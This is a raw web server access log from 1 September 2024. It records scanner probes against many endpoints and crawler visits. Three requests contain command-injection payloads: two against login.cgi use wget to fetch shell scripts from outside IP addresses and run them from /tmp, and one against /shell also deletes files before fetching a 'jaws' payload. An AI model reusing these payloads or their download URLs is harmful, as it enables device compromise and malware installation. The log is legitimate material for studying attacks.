64.226.115.204 - - [01/Sep/2024:06:01:19 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.90.210.55 - - [01/Sep/2024:06:01:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.232.68.246 - - [01/Sep/2024:06:01:19 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
209.38.206.97 - - [01/Sep/2024:06:01:19 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
104.248.17.127 - - [01/Sep/2024:06:01:19 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
64.226.115.204 - - [01/Sep/2024:06:01:19 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
207.154.251.229 - - [01/Sep/2024:06:01:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.90.210.55 - - [01/Sep/2024:06:01:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.226.115.204 - - [01/Sep/2024:06:01:19 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
164.90.210.55 - - [01/Sep/2024:06:01:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
37.139.5.66 - - [01/Sep/2024:06:01:33 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
45.156.129.52 - - [01/Sep/2024:06:02:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.224.128.84 - - [01/Sep/2024:06:02:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
52.76.71.100 - - [01/Sep/2024:06:03:12 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
95.214.55.138 - - [01/Sep/2024:06:03:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.138.55 - - [01/Sep/2024:06:04:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.55 - - [01/Sep/2024:06:04:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.55 - - [01/Sep/2024:06:04:16 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.55 - - [01/Sep/2024:06:04:17 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
95.214.55.138 - - [01/Sep/2024:06:07:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.128.45 - - [01/Sep/2024:06:10:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
41.234.128.34 - - [01/Sep/2024:06:11:27 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
34.219.180.31 - - [01/Sep/2024:06:13:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0."
76.11.185.195 - - [01/Sep/2024:06:16:00 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
185.224.128.84 - - [01/Sep/2024:06:20:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
